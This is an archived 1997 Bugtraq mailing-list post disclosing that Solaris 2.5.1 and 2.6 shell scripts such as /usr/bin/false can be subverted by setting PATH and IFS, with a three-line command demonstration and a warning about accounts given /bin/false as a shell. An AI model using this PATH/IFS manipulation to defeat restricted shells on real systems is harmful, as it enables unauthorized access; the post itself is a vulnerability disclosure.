Bugtraq mailing list archives
Buggy /usr/bin shell scripts
From: obi () VIC20 DZP SE (obi () VIC20 DZP SE)
Date: Sat, 6 Dec 1997 13:31:01 +0100
This is old news, but it seem to be around still. Solaris 2.5.1 and 2.6: $ ln -s /usr/bin/true /tmp/e $ PATH=/tmp IFS=x /usr/bin/false $ echo $? 0 This combined with the habit of giving non-login accounts /bin/false as a shell feels dangerous. Credits to Wilhelm Mueller for bringing it up in gnu.bash.bug in the sense of a security related bug.
Current thread:
- Buggy /usr/bin shell scripts obi () VIC20 DZP SE (Dec 06)
- Microsoft, CNET, BUGTRAQ and the 'land' attack Geoffrey King (Dec 06)
- Re: Microsoft, CNET, BUGTRAQ and the 'land' attack Aleph One (Dec 08)
- KSR[T] #005: Dillon crontab / crond KSR[T] (Dec 09)
- cgiwrap-3.5 (and 3.6beta1, Duncan Simpson (Dec 06)
- Re: Buggy /usr/bin shell scripts Casper Dik (Dec 07)
- Microsoft, CNET, BUGTRAQ and the 'land' attack Geoffrey King (Dec 06)